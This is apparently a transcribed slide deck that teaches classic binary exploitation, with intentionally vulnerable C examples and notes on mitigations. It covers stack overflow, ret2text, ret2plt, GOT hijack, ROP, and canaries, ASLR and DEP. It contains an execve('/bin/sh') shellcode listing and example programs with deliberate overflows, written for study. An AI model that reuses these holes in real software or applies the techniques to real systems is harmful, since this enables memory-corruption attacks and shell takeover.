
別pwn那裡.pdf

terrynini
December 16, 2018


Transcript

  1. Before learning the ancient pwn, make sure that you understand the concept of a stack frame. If you do not, there is an earlier set of material for you from 2018/12/14. All the example code is at the end of this material.
  2. ancient pwn $ gcc -fno-stack-protector pwn_01.c -o pwn_01
 $ ./pwn_01


    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 [1] 19730 segmentation fault (core dumped) ./pwn_01 These are old techniques, so some modern mitigations have to be turned off first: -fno-stack-protector above disables the stack canary (see the Stack Guard slides). pwn_01.c itself is not reproduced in this transcript; the crash comes from the over-long input, as in the example programs at the end.
  3. ancient pwn Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

    address high address name[0]~name[7] name[8]~name[15] name[16]~name[23]
  4. ancient pwn Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

    address high address name[0]~name[7] name[8]~name[15] name[16]~name[23] aaaaaaaa aaaaaaaa
  5. ancient pwn Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

    address high address name[0]~name[7] name[8]~name[15] name[16]~name[23] aaaaaaaa aaaaaaaa STACK Overflow ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  6. ancient pwn 0 Previous RBP Return Address \00\00\00\00\00\00\00\00 low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value
  7. ancient pwn 0 Previous RBP Return Address aaaaaaaa low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value
  8. ancient pwn 0 Previous RBP Return Address aaaaaaaa low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value 0x6161616161616161
  9. ancient pwn 0 Previous RBP Return Address aaaaaaaa low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value Buffer Overflow! 0x6161616161616161 /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  10. ancient pwn Return Address aaaaaaaa aaaaaaaa low address high address

    name[0]~name[7] name[8]~name[15] Previous RBP
  11. ancient pwn Return Address aaaaaaaa aaaaaaaa low address high address

    name[0]~name[7] name[8]~name[15] Previous RBP aaaaaaaa 0x0400577 0000000000400577 <cheat>: 400577: push rbp 400578: mov rbp,rsp 40057b: lea rdi,[rip+0xd6] 400582: call 400460 <puts@plt> 400587: nop 400588: pop rbp 400589: ret .--------------------------------------. | | | | | | | | | | | | | | | | '--------------------------------------'
  12. .--------------------------------------. | | | | | | | | |

    | | | | | | | '--------------------------------------' ancient pwn Return Address aaaaaaaa aaaaaaaa low address high address name[0]~name[7] name[8]~name[15] Previous RBP aaaaaaaa 0x0400577 Control Flow Hijack ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 0000000000400577 <cheat>: 400577: push rbp 400578: mov rbp,rsp 40057b: lea rdi,[rip+0xd6] 400582: call 400460 <puts@plt> 400587: nop 400588: pop rbp 400589: ret
  13. ancient pwn Overwriting the return address so that the function returns into a piece of code that already exists in the binary (here cheat() at 0x400577) is called ret2text. It needs no injected shellcode, so DEP does not stop it, but it relies on the code address being known, i.e. on the binary not being PIE (see the ASLR slides).
  14. Return Address shellcode shellcode note[0x90]~note[0x97] Previous RBP Shellcode push 0x68

    mov rax, 0x732f2f2f6e69622f push rax mov rdi, rsp push 0x1010101 ^ 0x6873 xor dword ptr [rsp], 0x1010101 xor esi, esi push rsi push 8 pop rsi add rsi, rsp push rsi mov rsi, rsp xor edx, edx push SYS_execve pop rax syscall note[0x97]~note[0x9e] .------------------------------------. | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | '------------------------------------' | | | asm() '---------------------------->
  15. Return Address shellcode shellcode 0x7ffcbe83d7c0 high address Previous RBP Shellcode

    Garbage 0x7ffcbe83d7c0 note[0x90]~note[0x97] note[0x98]~note[0x9f]
  16. Return Address shellcode shellcode 0x7ffcbe83d7c0 high address Previous RBP Shellcode

    Garbage 0x7ffcbe83d7c0 note[0x90]~note[0x97] note[0x98]~note[0x9f] return to shellcode! This only works when the stack is executable (no DEP/NX, see the DEP slides) and the attacker knows the buffer's address: pwn_04 prints it with %p, which defeats stack ASLR for that run.
  17. Stack Guard Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

    address high address name[0]~name[7] name[8]~name[15] name[16]~name[23] canary
  18. Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low address high

    address name[0]~name[7] name[8]~name[15] name[16]~name[23] canary aaaaaaaa aaaaaaaa aaaaaaaa Stack Guard
  19. Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low address high

    address name[0]~name[7] name[8]~name[15] name[16]~name[23] canary aaaaaaaa aaaaaaaa aaaaaaaa stack smashing detected /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Stack Guard
  20. ASLR Address Space Layout Randomization ASLR is a kernel feature, and the Linux kernel enables it by default: the stack, heap and shared-library bases get a different address in every run. The binary's own .text is only randomized if it was built as a position-independent executable (PIE); otherwise addresses such as 0x400577 (cheat in pwn_03) are fixed, which is what the ret2text example relied on.
  21. ASLR Address Space Layout Randomization 0000000000400577 <cheat>: 400577: push rbp

    400578: mov rbp,rsp 40057b: lea rdi,[rip+0xd6] 400582: call 400460 <puts@plt> 400587: nop 400588: pop rbp 400589: ret 00000000000006ca <cheat>: 6ca: push rbp 6cb: mov rbp,rsp 6ce: lea rdi,[rip+0xd3] 6d5: call 580 <puts@plt> 6da: nop 6db: pop rbp 6dc: ret .---------------------------------------. .----------------------------------. | | | | | | | | | | | | | | PIE | | | |>>>>>>>>>>>>>>>>>>>>>>| | | | | | | | | |
 | | | | | | | |
 | | | | '---------------------------------------' '----------------------------------'
  22. DEP Data execution prevention DEP needs hardware support, the CPU's NX (no-execute) bit, which lets the kernel mark memory pages as non-executable. Writable data pages such as the stack and heap are then mapped without execute permission, so control flow that lands on them faults instead of running the injected bytes.
  23. $ gcc -fno-stack-protector pwn_04.c -o pwn_04 DEP Data execution prevention With DEP/NX in effect (the normal case for a binary built like this, unless the stack is explicitly marked executable), shellcode placed on the stack or heap cannot be executed, so the ret2shellcode technique above no longer works; the remaining options reuse code that is already executable (ret2text, ret2plt, ROP).
  24. PLT&GOT Procedure Linkage Table & Global offset Table A dynamically linked binary has to resolve (relocate) its library function calls at run time. $ gcc -c pwn_05.c -o pwn_05.o
  25. PLT&GOT Procedure Linkage Table & Global offset Table A dynamically linked binary has to resolve (relocate) its library function calls at run time. $ gcc -c pwn_04.c -o pwn_04.o
  26. PLT&GOT Procedure Linkage Table & Global offset Table The addresses of external functions are unknown when the object file is produced (the call below still carries a zero displacement, e8 00 00 00 00, shown as call 35 <main+0x35>), and the code segment should not be patched at load time, since it is mapped read-only and shared between processes. 0000000000000000 <main>: ... 30: e8 00 00 00 00 call 35 <main+0x35> 35: 48 8d 85 f0 fe ff ff lea rax,[rbp-0x110]
  27. PLT&GOT Procedure Linkage Table & Global offset Table To solve that, we have the GOT (global offset table): calls go through a pointer slot in the GOT, and the dynamic loader (ld.so) is responsible for resolving each xxxx@GLIBC symbol and filling in its slot at load time. <main>: call printf@GOT GOT 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------.
 | scanf@GLIBC | '---------------' .---------------.
 | printf@GLIBC | '---------------' .---------------.
 | read@GLIBC | '---------------' .---------------.
 | exit@GLIBC | '---------------' .------------> ---' .-------> | ---'
  28. PLT&GOT Procedure Linkage Table & Global offset Table When a binary is large, filling in the whole GOT at startup takes a long time, and some of the functions will never be called in a given run, so resolving all of them every time is wasted work.
  29. PLT&GOT Procedure Linkage Table & Global offset Table To solve that, we have the PLT (procedure linkage table) and a mechanism called lazy binding: the first call goes through the stub below into the resolver, which writes the real address into the GOT; every later call jumps straight through the GOT entry. <main>: call printf@plt GOT .---------------.
 | printf@GLIBC | '---------------' .-------> ---' .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------' .----------> | | first call | -----------' ------------. second call | | | | '----> .----. | ld | '----' | | | | resolve | | | v
  30. ret2plt Return Address aaaaaaaa aaaaaaaa low address high address Previous

    RBP .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------'
  31. ret2plt Return Address aaaaaaaa aaaaaaaa low address high address Previous

    RBP Garbage printf@plt .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------'
  32. Return Address aaaaaaaa aaaaaaaa low address high address Previous RBP

    Garbage printf@plt .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------' Return to plt ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ret2plt
  33. $ gcc -zlazy pwn_04.c -o pwn_04 GOT Hijack If lazy binding is in effect, the GOT must remain writable at run time so the resolver can fill entries in on first use, and that is exactly what makes the GOT-overwrite attack on the next slides possible. With -z now (Full RELRO) every entry is resolved at load time and the GOT is remapped read-only before main() runs, so this hijack fails; -zlazy above forces lazy binding so that the demo works.
  34. .---------------.
 | call puts | '---------------' GOT+0x20 .------------.
 | puts@GLIBC

    | '------------' ---> -------> 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------------------. | | | | | | | | | | | | | | '---------------------------' .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> GOT Hijack
  35. .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' .---------------.
 | call

    puts | '---------------' GOT+0x20 .------------.
 | puts@GLIBC | '------------' ---> -------> 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------------------. | | | | | | | | | | | | | | '---------------------------' .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> GOT Hijack
  36. .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' | .--------------------------' |

    | | v Over Write .---------------.
 | call puts | '---------------' GOT+0x20 .------------.
 | puts@GLIBC | '------------' ---> -------> 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------------------. | | | | | | | | | | | | | | '---------------------------' .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> GOT Hijack
  37. .------------.
 | call puts | '------------' GOT+0x20 .-------------------------------.
 | __libc_system@@GLIBC_PRIVATE

    | '-------------------------------' ---> .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' | .--------------------------' | | | v Over Write ---> .-------------------.
 | system(“/bin/sh”) | '-------------------' GOT Hijack
  38. GOT Hijack .------------.
 | call puts | '------------' GOT+0x20 .-------------------------------.


    | __libc_system@@GLIBC_PRIVATE | '-------------------------------' ---> .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' | .--------------------------' | | | v Over Write ---> .-------------------.
 | system(“/bin/sh”) | '-------------------' GOT Hijack ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  39. .------------. | | | | | | | | '------------'

    ROP Return Oriented Programming xor rax, rax ret inc rax ret mov rcx, rax ret .------------. | | | | | | | | '------------' .--------------. | | | | | | | | '--------------' 0x8010AB0 0x8010CD0 0x8010EF0 + +
  40. .----------------------------------------------------------------------------. | | | | | | | | |

    | | | | | | | ‘----------------------------------------------------------------------------' .------------. | | | | | | | | '------------' ROP Return Oriented Programming xor rax, rax ret inc rax ret mov rcx, rax ret .------------. | | | | | | | | '------------' .--------------. | | | | | | | | '--------------' 0x8010AB0 0x8010CD0 0x8010EF0 + + .------------. | | | | | | | | '------------' xor rax, rax inc rax mov rcx, rax .------------. | | | | | | | | '------------' rcx = 1 = =
  41. .------------. | | | | | | | | '------------'

    .--------------. | | | | | | | | '--------------' Return Address aaaaaaaa aaaaaaaa low address high address Previous RBP .------------. | | | | | | | | '------------' xor rax, rax ret inc rax ret mov rcx, rax ret 0x8010AB0 0x8010CD0 0x8010EF0 0x8010CD0 0x8010AB0 0x8010EF0 ROP aaaaaaaa
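  /* 42. Example pwn_02.c -- struct-field overwrite through an over-long read(). */
#include <stdio.h>
#include <unistd.h>

typedef struct {
    char name[8];          /* 8 bytes: no room for a terminator once it is full */
    long int Taiwan_value; /* laid out directly after name[] */
} passport;

int main(){
    passport visitor;
    visitor.Taiwan_value = 0;
    /* Intentional bug (the lesson): 18 bytes are read into an 8-byte field, so
     * input bytes 8..15 land in Taiwan_value and bytes 16..17 spill past the
     * 16-byte struct. Any input whose bytes 8..15 form a positive long wins. */
    read(0, visitor.name, 18);
    if( visitor.Taiwan_value > 0){
        /* name is not NUL-terminated when full; %s keeps printing into Taiwan_value. */
        printf(" %s !? welcome, Taiwanese.", visitor.name);
        /* %ld: Taiwan_value is a long. The original used %d, a format/argument
         * mismatch (undefined behaviour) that also printed only the low 32 bits. */
        printf("Value : %ld",visitor.Taiwan_value);
    }else{
        printf(" %s ?? Get off, outlander.",visitor.name);
    }
    return 0;
}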
  /* 43. Example pwn_03.c -- ret2text target: cheat() is never called by main(). */
#include <stdio.h>
#include <unistd.h>

/* Unreachable through normal control flow; the exploit returns into it (slides 10-13). */
void cheat(){ puts("My grandpa taught me this in Hawaii "); }

int main(){
    char name[0x10];
    /* Intentional overflow: 0x20 bytes into a 0x10-byte buffer. As the slide
     * layout shows, the extra 0x10 bytes cover the saved RBP and the return address. */
    read(0, name, 0x20);
    /* name may not be NUL-terminated, so %s can print bytes beyond it. */
    printf("%s", name);
    return 0;
}
  /* 44. Example pwn_04.c -- ret2shellcode: leaks the buffer address, then overflows it. */
#include <stdio.h>
#include <unistd.h>

int main(){
    char note[0x100];
    /* Leaks the stack address of note; the exploit uses it as the return address
     * (slides 14-16), which sidesteps stack ASLR for this run. */
    printf("the address is : %p \n",note);
    /* Intentional overflow: 0x120 bytes into a 0x100-byte buffer; the extra
     * 0x20 bytes reach the saved RBP and the return address. */
    read(0, note, 0x120);
    return 0;
}
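  /* 45. Example pwn_05.c -- shows where printf and system live in libc and their distance. */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>   /* system(); the original omitted it, leaving system() implicitly declared */
#include <unistd.h>

int main(){
    puts("So... where is the system ?");
    system("echo 'here'");
    /* Widen the function pointers to uintptr_t before subtracting. The original
     * cast both to int, which drops the upper 32 bits of a 64-bit address and is
     * not a valid way to compute a distance. For a given libc build this offset
     * stays constant across runs: ASLR moves the libc base, not its layout. */
    long offset = (long)((uintptr_t)system - (uintptr_t)printf);
    printf("printf is at %p\nsystem is at %p\noffset = %ld\n", (void *)printf, (void *)system, offset);
    return 0;
}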